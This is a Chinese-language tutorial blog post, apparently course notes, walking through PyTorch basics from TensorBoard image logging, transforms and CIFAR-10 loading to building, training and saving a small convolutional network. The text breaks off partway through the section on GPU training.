    TensorBoard 的使用(二)

    主要讲了 writer.add_image 的用法。

    def add_image(    self, tag, img_tensor, global_step=None, walltime=None, dataformats="CHW"):    """Add image data to summary.    Note that this requires the ``pillow`` package.                                        Args:        tag (str): Data identifier        img_tensor (torch.Tensor, numpy.ndarray, or string/blobname): Image data        global_step (int): Global step value to record        walltime (float): Optional override default walltime (time.time())          seconds after epoch of event        dataformats (str): Image data format specification of the form          CHW, HWC, HW, WH, etc.    Shape:        img_tensor: Default is :math:`(3, H, W)`. You can use ``torchvision.utils.make_grid()`` to        convert a batch of tensor into 3xHxW format or call ``add_images`` and let us do the job.        Tensor with :math:`(1, H, W)`, :math:`(H, W)`, :math:`(H, W, 3)` is also suitable as long as        corresponding ``dataformats`` argument is passed, e.g. ``CHW``, ``HWC``, ``HW``.                                        Examples::                                            from torch.utils.tensorboard import SummaryWriter        import numpy as np        img = np.zeros((3, 100, 100))        img[0] = np.arange(0, 10000).reshape(100, 100) / 10000        img[1] = 1 - np.arange(0, 10000).reshape(100, 100) / 10000                                            img_HWC = np.zeros((100, 100, 3))        img_HWC[:, :, 0] = np.arange(0, 10000).reshape(100, 100) / 10000        img_HWC[:, :, 1] = 1 - np.arange(0, 10000).reshape(100, 100) / 10000                                            writer = SummaryWriter()        writer.add_image('my_image', img, 0)                                            # If you have non-default dimension setting, set the dataformats argument.        writer.add_image('my_image_HWC', img_HWC, 0, dataformats='HWC')        writer.close()                                        Expected result:                                        .. image:: _static/img/tensorboard/add_image.png       :scale: 50%                                        """

    ​ 从 PIL 到 numpy,需要在 add_image() 中指定 shape 中每一个数字/维表示的含义。dataformats="HWC"(高、宽、通道数)

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    from torch.utils.tensorboard import SummaryWriter
    import numpy as np
    from PIL import Image

    writer = SummaryWriter("logs")
    image_path = r"dataset\train\ants\0013035.jpg"
    img_PIL = Image.open(image_path)
    img_array = np.array(img_PIL)
    print(type(img_array))
    print(img_array.shape)

    writer.add_image("test", img_array, 2, dataformats="HWC")
    for i in range(100):
    writer.add_scalar("y=2x", 2 * i, i)

    writer.close()

    png

    Transforms 的使用

    transforms 是一个工具包,读入图片经过 transforms 后产生结果。

    transforms.ToTensor() 将 Image 格式转换成 tensor 格式。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    from torchvision import transforms
    from PIL import Image
    from torch.utils.tensorboard import SummaryWriter

    img_path = r"dataset/train/ants/0013035.jpg"
    img = Image.open(img_path)

    writer = SummaryWriter("logs")

    # transforms 该如何被使用
    tensor_trans = transforms.ToTensor()
    tensor_img = tensor_trans(img)

    print(tensor_img)

    writer.add_image("Tensor_img", tensor_img)

    writer.close()

    常见的 Transforms(一)

    讲了 transforms.Normalize 的用法。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    class Normalize(torch.nn.Module):
    """Normalize a tensor image with mean and standard deviation. 使用平均值和标准偏差归一化张量图像
    This transform does not support PIL Image.
    Given mean: ``(mean[1],...,mean[n])`` and std: ``(std[1],..,std[n])`` for ``n``
    channels, this transform will normalize each channel of the input
    ``torch.*Tensor`` i.e.,
    ``output[channel] = (input[channel] - mean[channel]) / std[channel]``

    .. note::
    This transform acts out of place, i.e., it does not mutate the input tensor.

    Args:
    mean (sequence): Sequence of means for each channel.
    std (sequence): Sequence of standard deviations for each channel.
    inplace(bool,optional): Bool to make this operation in-place.

    """
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    from PIL import Image
    from torch.utils.tensorboard import SummaryWriter
    from torchvision import transforms

    writer = SummaryWriter("logs")
    img = Image.open("images/pytorch.png")
    print(img)

    # ToTensor
    trans_totensor = transforms.ToTensor()
    img_tensor = trans_totensor(img)
    writer.add_image("ToTensor", img_tensor)

    # Normalize
    print(img_tensor[0][0][0])
    trans_norm = transforms.Normalize([6, 3, 2], [9, 3, 5])
    img_norm = trans_norm(img_tensor)
    print(img_norm[0][0][0])
    writer.add_image("Normalize", img_norm, 1)

    png

    常见的 Transforms(二)

    Resize 调整图像大小。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    # Resize
    print(img.size)
    trans_resize = transforms.Resize((512, 512))
    # img PIL -> resize -> img_resize PIL
    img_resize = trans_resize(img)
    # img_resize PIL -> totensor -> img_resize tensor
    img_resize = trans_totensor(img_resize)
    writer.add_image("Resize", img_resize, 0)
    print(img_resize)

    png


    Compose: 将transforms列表里面的transform操作进行遍历。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    class Compose:
    """Composes several transforms together. This transform does not support torchscript.
    Please, see the note below.

    Args:
    transforms (list of ``Transform`` objects): list of transforms to compose.

    Example:
    >>> transforms.Compose([
    >>> transforms.CenterCrop(10),
    >>> transforms.PILToTensor(),
    >>> transforms.ConvertImageDtype(torch.float),
    >>> ])

    .. note::
    In order to script the transformations, please use ``torch.nn.Sequential`` as below.

    >>> transforms = torch.nn.Sequential(
    >>> transforms.CenterCrop(10),
    >>> transforms.Normalize((0.485, 0.456, 0.406), (0.229, 0.224, 0.225)),
    >>> )
    >>> scripted_transforms = torch.jit.script(transforms)

    Make sure to use only scriptable transformations, i.e. that work with ``torch.Tensor``, does not require
    `lambda` functions or ``PIL.Image``.

    """
    1
    2
    3
    4
    5
    6
    # Compose - resize - 2
    trans_resize_2 = transforms.Resize(512)
    # PIL -> PIL -> tensor
    trans_compose = transforms.Compose([trans_resize_2, trans_totensor])
    img_resize_2 = trans_compose(img)
    writer.add_image("Resize", img_resize_2, 1)

    ​ 相当于先缩放 trans_resize_2,再转换成 tensor 类型 trans_totensor


    RandomCrop 随机裁剪

    1
    2
    3
    4
    5
    6
    # RandomCrop
    trans_random = transforms.RandomCrop([32, 64])
    trans_compose_2 = transforms.Compose([trans_random, trans_totensor])
    for i in range(10):
    img_crop = trans_compose_2(img)
    writer.add_image("RandomCropHW", img_crop, i)

    png

    torchvision 中的数据集使用

    ​ 在官网上查看 torchvision.datasets 的用法

    ​ 选用 CIFAR10 数据集,读入 train_settest_set

    1
    2
    train_set = torchvision.datasets.CIFAR10(root="./dataset", train=True, transform=dataset_transform, download=True)
    test_set = torchvision.datasets.CIFAR10(root="./dataset", train=False, transform=dataset_transform, download=True)

    ​ 如果选择 download=True,会检查并验证 root 中是否存在数据集且是否完整,若没有,则会下载:

    1
    2
    3
    C:\Users\gzjzx\anaconda3\python.exe D:/Study/1st-year-master/XiaoTuDui/Test/P10_dataset_transform.py
    Downloading https://www.cs.toronto.edu/~kriz/cifar-10-python.tar.gz to ./dataset\cifar-10-python.tar.gz
    1%| | 1114112/170498071 [00:40<48:11, 58582.60it/s]

    ​ 可以将网址 https://www.cs.toronto.edu/~kriz/cifar-10-python.tar.gz 复制到迅雷中由训练代下载,速度会快,将下载好的数据库拷贝回去。

    1
    2
    3
    Using downloaded and verified file: ./dataset\cifar-10-python.tar.gz
    Extracting ./dataset\cifar-10-python.tar.gz to ./dataset
    Files already downloaded and verified

    ​ 根据官网 CIFAR-10 and CIFAR-100 datasets (toronto.edu) 对数据库的描述,查看数据信息:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    print(test_set[0])
    print(test_set.classes)

    img, target = test_set[0]
    print(img)
    print(target)
    print(test_set.classes[target])
    # img.show()
    print(test_set[0])

    # 在 TensorBoard 中查看数据集中前 10 张图
    writer = SummaryWriter("p10")
    for i in range(10):
    img, target = test_set[i]
    writer.add_image("test_set", img, i)

    writer.close()

    png

    DataLoader 的使用

    png

    • Pytorch 有两个类:
      • Dataset: 提供一种方式去获取数据及其标签
        • 如何获取每一个数据及其标签
        • 告诉我们总共有多少数据
      • DataLoader: 为后面的网络提供不同的数据形式

    DataLoader 的使用:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    import torchvision

    # 准备的测试数据集
    from torch.utils.data import DataLoader
    from torch.utils.tensorboard import SummaryWriter

    test_data = torchvision.datasets.CIFAR10("./dataset", train=False, transform=torchvision.transforms.ToTensor())

    test_loader = DataLoader(dataset=test_data, batch_size=4, shuffle=True, num_workers=0, drop_last=False)

    # 测试数据集中第一张图片及 target
    img, target = test_data[0]
    print(img.shape)
    print(target)

    writer = SummaryWriter("dataloader")
    step = 0
    for data in test_loader:
    imgs, targets = data
    # print(imgs.shape)
    # print(targets)
    writer.add_images("test_data", imgs, step)
    step += 1

    writer.close()

    test_loader = DataLoader(dataset=test_data, batch_size=4, shuffle=True, num_workers=0, drop_last=False)

    • dataset=test_data,读入 test_data 的数据集
    • batch_size=4,每次读入 4 张图片
    • shuffle=True,打乱图片顺序
    • drop_last=False,数据集数量如果不能被 batch_size 整除,要丢弃最后一块吗?否

    png

    神经网络的基本骨架-nn.Module的使用

    ​ 查看帮助文档:

    ​ 对于神经网络的前向传播,input-forward-output, 自行设计一个神经网络的类,继承 nn.Moudle:初始化时,super(Model, self).__init__()

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    import torch.nn as nn
    import torch.nn.functional as F

    class Model(nn.Module):
    def __init__(self):
    super(Model, self).__init__()
    self.conv1 = nn.Conv2d(1, 20, 5)
    self.conv2 = nn.Conv2d(20, 20, 5)

    def forward(self, x):
    x = F.relu(self.conv1(x))
    return F.relu(self.conv2(x))

    ​ 设计一个最简单的函数,让 output 为 input 的加 1:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    import torch
    from torch import nn

    class MyClass(nn.Module):
    def __init__(self):
    super().__init__()

    def forward(self, input):
    output = input + 1
    return output

    myClass = MyClass()
    input = torch.tensor(1.0)
    output = myClass(input)
    print(output)
    1
    tensor(2.)

    土堆说卷积操作(可选看)

    ​ 大概讲了卷积操作 torch.nn.functional.conv2dstridepadding 的含义。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    import torch
    import torch.nn.functional as F

    input = torch.tensor([[1, 2, 0, 3, 1],
    [0, 1, 2, 3, 1],
    [1, 2, 1, 0, 0],
    [5, 2, 3, 1, 1],
    [2, 1, 0, 1, 1]])

    kernel = torch.tensor([[1, 2, 1],
    [0, 1, 0],
    [2, 1, 0]])

    input = torch.reshape(input, (1, 1, 5, 5))
    kernel = torch.reshape(kernel, (1, 1, 3, 3))

    print(input.shape)
    print(kernel.shape)

    output = F.conv2d(input, kernel, stride=1)
    print(output)

    output2 = F.conv2d(input, kernel, stride=2)
    print(output2)

    output3 = F.conv2d(input, kernel, stride=1, padding=1)
    print(output3)
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    torch.Size([1, 1, 5, 5])
    torch.Size([1, 1, 3, 3])
    tensor([[[[10, 12, 12],
    [18, 16, 16],
    [13, 9, 3]]]])
    tensor([[[[10, 12],
    [13, 3]]]])
    tensor([[[[ 1, 3, 4, 10, 8],
    [ 5, 10, 12, 12, 6],
    [ 7, 18, 16, 16, 8],
    [11, 13, 9, 3, 4],
    [14, 13, 9, 7, 4]]]])

    神经网络-卷积层

    官方文档:

    torch.nn.Conv2d(in_channels, out_channels, kernel_size, stride=1, padding=0, dilation=1, groups=1, bias=True, padding_mode='zeros', device=None, dtype=None)

    • in_channels (int) – Number of channels in the input image 输入图像中的通道数
    • out_channels (int) – Number of channels produced by the convolution 卷积产生的通道数
    • kernel_size (int or tuple) – Size of the convolving kernel 卷积核的大小
    • stride (int or tuple, optional) – Stride of the convolution. Default: 1
    • padding (int, tuple or str, optional) – Padding added to all four sides of the input. Default: 0

    较少用:

    • padding_mode (str, optional) – 'zeros', 'reflect', 'replicate' or 'circular'. Default: 'zeros'
    • dilation (int or tuple, optional) – Spacing between kernel elements. Default: 1 内核元素之间的间距。默认值:1
    • groups (int, optional) – Number of blocked connections from input channels to output channels. Default: 1 从输入通道到输出通道的阻塞连接数。默认值:1
    • bias (bool, optional) – If True, adds a learnable bias to the output. Default: True 如果为“True”,则在输出中添加可学习的偏差。

    png

    ​ 输入/输出的大小计算公式,如果看论文时论文没有阐明,可以用这个公式推断出具体的参数。


    导入相关库:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    import torch
    import torchvision
    from torch import nn
    from torch.nn import Conv2d
    from torch.utils.data import DataLoader
    from torch.utils.tensorboard import SummaryWriter

    dataset = test_data = torchvision.datasets.CIFAR10("./dataset",
    train=False,
    transform=torchvision.transforms.ToTensor(),
    download=True)
    dataloader = DataLoader(dataset, batch_size=64)

    设计卷积神经网络结构:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    class MyClass(nn.Module):
    def __init__(self):
    super(MyClass, self).__init__()
    self.conv1 = Conv2d(in_channels=3, out_channels=6, kernel_size=3, stride=1, padding=0)

    def forward(self, x):
    x = self.conv1(x)
    return x


    myClass = MyClass()
    print(myClass)

    执行操作并输出到 Tensorboard 上:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    writer = SummaryWriter("./logs")
    step = 0
    for data in dataloader:
    imgs, targets = data
    output = myClass(imgs)
    print(imgs.shape)
    print(output.shape)
    # torch.Size([64, 3, 32, 32])
    writer.add_images("input", imgs, step)
    # torch.Size([64, 6, 30, 30]) -> [xxx, 3, 30, 30]
    output = torch.reshape(output, (-1, 3, 30, 30))
    writer.add_images("output", output, step)
    step += 1

    png

    神经网络-最大池化的使用

    Max-pooling 是 下采样的一种。

    官方文档:

    torch.nn.MaxPool2d(kernel_size, stride=None, padding=0, dilation=1, return_indices=False, ceil_mode=False)

    • kernel_size (Union[int, Tuple[int, int]**]) – the size of the window to take a max over 要放大的窗口的大小
    • stride (Union[int, Tuple[int, int]**]) – the stride of the window. Default value is kernel_size 窗户的跨步
    • padding (Union[int, Tuple[int, int]**]) – Implicit negative infinity padding to be added on both sides 要在两侧添加的隐式负无穷大填充
    • dilation (Union[int, Tuple[int, int]**]) – a parameter that controls the stride of elements in the window 一个参数,用于控制窗口中元素的步幅
    • return_indices (bool) – if True, will return the max indices along with the outputs. Useful for torch.nn.MaxUnpool2d later 如果为“True”,则将返回最大索引以及输出
    • ceil_mode (bool) – when True, will use ceil instead of floor to compute the output shap 当为True时,将使用ceil(向上取整)而不是floor(向下取整)来计算输出形状

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    import torch
    import torchvision
    from torch import nn
    from torch.nn import MaxPool2d
    from torch.utils.data import DataLoader
    from torch.utils.tensorboard import SummaryWriter

    dataset = test_data = torchvision.datasets.CIFAR10("./dataset",
    train=False,
    transform=torchvision.transforms.ToTensor(),
    download=True)
    dataloader = DataLoader(dataset, batch_size=64)

    input = torch.tensor([[1, 2, 0, 3, 1],
    [0, 1, 2, 3, 1],
    [1, 2, 1, 0, 0],
    [5, 2, 3, 1, 1],
    [2, 1, 0, 1, 1]], dtype=torch.float32)
    torch.reshape(input, (-1, 1, 5, 5))
    print(input.shape)


    class MyClass(nn.Module):
    def __init__(self):
    super(MyClass, self).__init__()
    self.maxpool1 = MaxPool2d(kernel_size=3, ceil_mode=False)

    def forward(self, input):
    output = self.maxpool1(input)
    return output


    myClass = MyClass()

    writer = SummaryWriter("./logs_maxpool")
    step = 0

    for data in dataloader:
    imgs, targets = data
    writer.add_images("input", imgs, step)
    output = myClass(imgs)
    writer.add_images("output", output, step)
    step += 1

    writer.close()

    png

    神经网络-非线性激活

    官方文档:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    import torch
    import torchvision
    from torch import nn
    from torch.nn import ReLU
    from torch.utils.data import DataLoader
    from torch.utils.tensorboard import SummaryWriter

    input = torch.tensor([[1, -0.5],
    [-1, 3]])

    input = torch.reshape(input, (-1, 1, 2, 2)) # 将其转换为 ReLU 能接受的形式
    print(input.shape)

    dataset = torchvision.datasets.CIFAR10("./dataset", train=False, download=True,
    transform=torchvision.transforms.ToTensor())

    dataloader = DataLoader(dataset, batch_size=64)


    class MyClass(nn.Module):
    def __init__(self):
    super(MyClass, self).__init__()
    self.relu1 = ReLU()

    def forward(self, input):
    output = self.relu1(input)
    return output


    myclass = MyClass()

    writer = SummaryWriter("./logs_relu")
    step = 0
    for data in dataloader:
    imgs, targets = data
    writer.add_images("inputs", imgs, global_step=step)
    output = myclass(imgs)
    writer.add_images("output", output, step)
    step += 1

    writer.close()

    png

    神经网络-线性层及其他层介绍

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    import torch
    import torchvision
    from torch import nn
    from torch.nn import Linear
    from torch.utils.data import DataLoader

    dataset = torchvision.datasets.CIFAR10("./dataset", train=False, transform=torchvision.transforms.ToTensor(),
    download=True)

    dataloader = DataLoader(dataset, batch_size=64)


    class MyClass(nn.Module):
    def __init__(self):
    super(MyClass, self).__init__()
    self.linear1 = Linear(196608, 10)

    def forward(self, input):
    output = self.linear1(input)
    return output


    myclass = MyClass()

    for data in dataloader:
    imgs, targets = data
    print(imgs.shape)
    output = torch.flatten(imgs)
    # output = torch.reshape(imgs, (1, 1, 1, -1))
    print(output.shape)
    output = myclass(output)
    print(output.shape)

    ​ 从 torch.nn — PyTorch 2.0 documentation 获取更多神经网络架构。

    ​ 也可从 Search — Torchvision 0.15 documentation (pytorch.org)Models and pre-trained weights — Torchvision 0.15 documentation (pytorch.org) 获取经典神经网络模型。

    神经网络-搭建小实战和 Sequential 的使用

    ​ 使用 Sequential() 将多个神经网络架构整合成一个。

    ​ 整合如下神经网络:

    png

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    import torch
    from torch import nn
    from torch.nn import Conv2d, MaxPool2d, Flatten, Linear, Sequential
    from torch.utils.tensorboard import SummaryWriter


    class MyClass(nn.Module):
    def __init__(self):
    super(MyClass, self).__init__()
    self.model1 = Sequential(
    Conv2d(3, 32, 5, padding=2),
    MaxPool2d(2),
    Conv2d(32, 32, 5, padding=2),
    MaxPool2d(2),
    Conv2d(32, 64, 5, padding=2),
    MaxPool2d(2),
    Flatten(),
    Linear(1024, 64),
    Linear(64, 10)
    )

    def forward(self, x):
    x = self.model1(x)
    return x

    myClass = MyClass()
    print(myClass)
    input = torch.ones((64, 3, 32, 32))
    output = myClass(input)
    print(output.shape)

    writer = SummaryWriter('../logs_seq')
    writer.add_graph(myClass, input)
    writer.close()

    ​ 在 SummaryWriter() 中显示完整架构。

    png

    损失函数与反向传播

    pytorch 中内置了很多损失函数。Search — PyTorch 2.0 documentation

    L1Loss()MSELoss()CrossEntropyLoss()

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    import torch
    from torch import nn
    from torch.nn import L1Loss, MSELoss

    inputs = torch.tensor([1, 2, 3], dtype=torch.float32)
    targets = torch.tensor([1, 2, 5], dtype=torch.float32)

    inputs = torch.reshape(inputs, (1, 1, 1, 3))
    targets = torch.reshape(targets, (1, 1, 1, 3))

    loss = L1Loss()
    result = loss(inputs, targets)

    loss_mse = MSELoss()
    result_mse = loss_mse(inputs, targets)

    print(result, result_mse)

    x = torch.tensor([0.1, 0.2, 0.3])
    y = torch.tensor([1])
    x = torch.reshape(x, (1, 3))
    loss_cross = nn.CrossEntropyLoss()
    result_cross = loss_cross(x, y)
    print(result_cross)

    ​ 对损失函数进行反向传播可以得到模型中各个参数的梯度。result_loss.backward()

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    import torch
    import torchvision
    from torch import nn
    from torch.nn import Conv2d, MaxPool2d, Flatten, Linear, Sequential
    from torch.utils.data import DataLoader
    from torch.utils.tensorboard import SummaryWriter

    dataset = torchvision.datasets.CIFAR10("../dataset", train=False, transform=torchvision.transforms.ToTensor(),
    download=True)

    dataloader = DataLoader(dataset, batch_size=1)


    class MyClass(nn.Module):
    def __init__(self):
    super(MyClass, self).__init__()
    self.model1 = Sequential(
    Conv2d(3, 32, 5, padding=2),
    MaxPool2d(2),
    Conv2d(32, 32, 5, padding=2),
    MaxPool2d(2),
    Conv2d(32, 64, 5, padding=2),
    MaxPool2d(2),
    Flatten(),
    Linear(1024, 64),
    Linear(64, 10)
    )

    def forward(self, x):
    x = self.model1(x)
    return x


    loss = nn.CrossEntropyLoss()
    myClass = MyClass()
    for data in dataloader:
    imgs, targets = data
    outputs = myClass(imgs)
    print(outputs)
    print(targets)
    result_loss = loss(outputs, targets)
    print(result_loss)
    result_loss.backward()

    优化器

    官方文档:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    loss = nn.CrossEntropyLoss()
    myClass = MyClass()
    optim = torch.optim.SGD(myClass.parameters(), lr=0.01)
    for epoch in range(20):
    running_loss = 0.0
    for data in dataloader:
    imgs, targets = data
    outputs = myClass(imgs)
    result_loss = loss(outputs, targets)
    optim.zero_grad()
    result_loss.backward()
    optim.step()
    running_loss = running_loss + result_loss
    print(running_loss)

    ​ 以最基本的随机梯度下降为例:optim = torch.optim.SGD(myClass.parameters(), lr=0.01)

    ,读入模型参数,然后读入学习率。

    • 嵌套在for epoch in range(20): 进行多轮参数优化。

    • 每次梯度下降都要清零梯度:optim.zero_grad()

    • 计算出新的梯度:result_loss.backward()

    • 更新模型参数:optim.step()

    ​ 一般而言,每轮迭代会让损失函数值变小。

    现有网络模型的使用及修改

    ​ 从官网 Models and pre-trained weights — Torchvision 0.15 documentation (pytorch.org) 中可以获得流行的模型以及 pretrain 后的模型。

    • 初始化 vgg-16 模型,参数不变:vgg16_false = torchvision.models.vgg16(pretrained=False)

    • 初始化 vgg-16 模型,并从官网上下载经过预训练后的参数:vgg16_true = torchvision.models.vgg16(pretrained=True)

    • 在现有模型后追加层:vgg16_true.add_module('add_linear', nn.Linear(1000, 10))

    • 在现有模型后更改层:vgg16_false.classifier[6] = nn.Linear(4096, 10)

    完整的模型训练套路(一)

    单独建一个 model.py 文件,用于定义模型:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    # 搭建神经网络
    import torch
    from torch import nn


    class MyClass(nn.Module):
    def __init__(self):
    super(MyClass, self).__init__()
    self.model = nn.Sequential(
    nn.Conv2d(3, 32, 5, padding=2),
    nn.MaxPool2d(2),
    nn.Conv2d(32, 32, 5, padding=2),
    nn.MaxPool2d(2),
    nn.Conv2d(32, 64, 5, padding=2),
    nn.MaxPool2d(2),
    nn.Flatten(),
    nn.Linear(1024, 64),
    nn.Linear(64, 10)
    )

    def forward(self, x):
    x = self.model(x)
    return x


    if __name__ == '__main__':
    myClass = MyClass()
    input = torch.ones((64, 3, 32, 32))
    output = myClass(input)
    print(output.shape)

    train.py 中,设置损失函数,优化器,训练轮次等训练神经网络:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    from model import *
    import torchvision

    # 准备数据集
    from torch import nn
    from torch.utils.data import DataLoader

    train_data = torchvision.datasets.CIFAR10(root='../dataset', train=True, transform=torchvision.transforms.ToTensor(),
    download=True)
    test_data = torchvision.datasets.CIFAR10(root='../dataset', train=False, transform=torchvision.transforms.ToTensor(),
    download=True)
    # length 长度
    train_data_size = len(train_data)
    test_data_size = len(test_data)
    print('训练数据集的长度为:{}'.format(train_data_size))
    print('测试数据集的长度为:{}'.format(test_data_size))

    # 利用 DataLoader 来加载数据集
    train_dataloader = DataLoader(train_data, batch_size=64)
    test_dataloader = DataLoader(test_data, batch_size=64)

    # 创建网络模型
    myClass = MyClass()

    # 损失函数
    loss_fn = nn.CrossEntropyLoss()

    # 定义优化器
    learning_rate = 1e-2
    optimizer = torch.optim.SGD(myClass.parameters(), lr=learning_rate)

    # 设置训练网络的一些参数
    total_train_step = 0 # 记录训练的次数
    total_test_step = 0 # 记录测试的次数
    epoch = 10 # 训练的轮数

    # 训练
    for i in range(epoch):
    print('第 {} 轮训练开始'.format(i + 1))
    # 训练步骤开始
    for data in train_dataloader:
    imgs, targets = data
    outputs = myClass(imgs)
    loss = loss_fn(outputs, targets)

    optimizer.zero_grad()
    loss.backward()
    optimizer.step()

    total_train_step = total_train_step + 1
    print('训练次数: {}, Loss: {}'.format(total_train_step, loss.item()))

    完整的模型训练套路(二)(三)

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    78
    79
    80
    81
    82
    83
    84
    from torch.utils.tensorboard import SummaryWriter
    from model import *
    import torchvision

    # 准备数据集
    from torch import nn
    from torch.utils.data import DataLoader

    train_data = torchvision.datasets.CIFAR10(root='../dataset', train=True, transform=torchvision.transforms.ToTensor(),
    download=True)
    test_data = torchvision.datasets.CIFAR10(root='../dataset', train=False, transform=torchvision.transforms.ToTensor(),
    download=True)
    # length 长度
    train_data_size = len(train_data)
    test_data_size = len(test_data)
    print('训练数据集的长度为:{}'.format(train_data_size))
    print('测试数据集的长度为:{}'.format(test_data_size))

    # 利用 DataLoader 来加载数据集
    train_dataloader = DataLoader(train_data, batch_size=64)
    test_dataloader = DataLoader(test_data, batch_size=64)

    # 创建网络模型
    myClass = MyClass()

    # 损失函数
    loss_fn = nn.CrossEntropyLoss()

    # 定义优化器
    learning_rate = 1e-2
    optimizer = torch.optim.SGD(myClass.parameters(), lr=learning_rate)

    # 设置训练网络的一些参数
    total_train_step = 0 # 记录训练的次数
    total_test_step = 0 # 记录测试的次数
    epoch = 10 # 训练的轮数

    # 添加 tensorboard
    writer = SummaryWriter('../logs_train')

    # 训练
    for i in range(epoch):
    print('第 {} 轮训练开始'.format(i + 1))
    # 训练步骤开始
    myClass.train()
    for data in train_dataloader:
    imgs, targets = data
    outputs = myClass(imgs)
    loss = loss_fn(outputs, targets)

    optimizer.zero_grad()
    loss.backward()
    optimizer.step()

    total_train_step = total_train_step + 1
    if total_train_step % 100 == 0:
    print('训练次数: {}, Loss: {}'.format(total_train_step, loss.item()))
    writer.add_scalar('train_loss', loss.item(), total_train_step)

    # 测试步骤开始
    myClass.eval()
    total_test_loss = 0
    total_accuracy = 0
    with torch.no_grad():
    for data in test_dataloader:
    imgs, targets = data
    outputs = myClass(imgs)
    loss = loss_fn(outputs, targets)

    total_test_loss = total_test_loss + loss

    accuracy = (outputs.argmax(1) == targets).sum()
    total_accuracy += accuracy
    print('整体测试集上的 Loss: {}'.format(total_test_loss))
    print('整体测试集上的正确率: {}'.format(total_accuracy / test_data_size))
    writer.add_scalar('test_loss', total_test_loss, total_test_step)
    writer.add_scalar('total_accuracy', total_accuracy / test_data_size, total_test_step)
    total_test_step += 1

    torch.save(myClass, "myClass_{}.pth".format(i))
    # torch.save(myClass.state_dict(), "myClass_{}.pth".format(i))
    print("模型已保存")

    writer.close()

    ​ 将模型调整为 train / eval 模式:myClass.train()myClass.eval(),该调整对 DropoutBatchNorm 等架构有效。

    ​ 测试步骤(不更新参数,不计算梯度,可以节约内存): with torch.no_grad():

    ​ 输出每轮次的损失函数的值:

    1
    2
    if total_train_step % 100 == 0:
    print('训练次数: {}, Loss: {}'.format(total_train_step, loss.item()))

    ​ 计算正确率:

    1
    2
    accuracy = (outputs.argmax(1) == targets).sum()
    total_accuracy += accuracy

    ​ 使用 SummaryWriter 可视化训练过程:

    • writer.add_scalar('train_loss', loss.item(), total_train_step)
    • writer.add_scalar('test_loss', total_test_loss, total_test_step)
    • writer.add_scalar('total_accuracy', total_accuracy / test_data_size, total_test_step)

    png

    ​ 保存每轮次训练出的模型:

    1
    2
    3
    torch.save(myClass, "myClass_{}.pth".format(i))
    # torch.save(myClass.state_dict(), "myClass_{}.pth".format(i))
    print("模型已保存")

    利用 GPU 训练(一)

    网络模型可以使用 cuda:

    1
    2
    3
    if torch.cuda.is_available():
    myClass = MyClass()
    myClass = myClass.cuda() # 将网络模型转到 cuda 上

    损失函数可以使用 cuda:

    1
    2
    3
    4
    # 损失函数
    if torch.cuda.is_available():
    loss_fn = nn.CrossEntropyLoss()
    loss_fn = loss_fn.cuda()

    优化器不可以。

    测试集、数据集数据可以使用 cuda:

    1
    2
    3
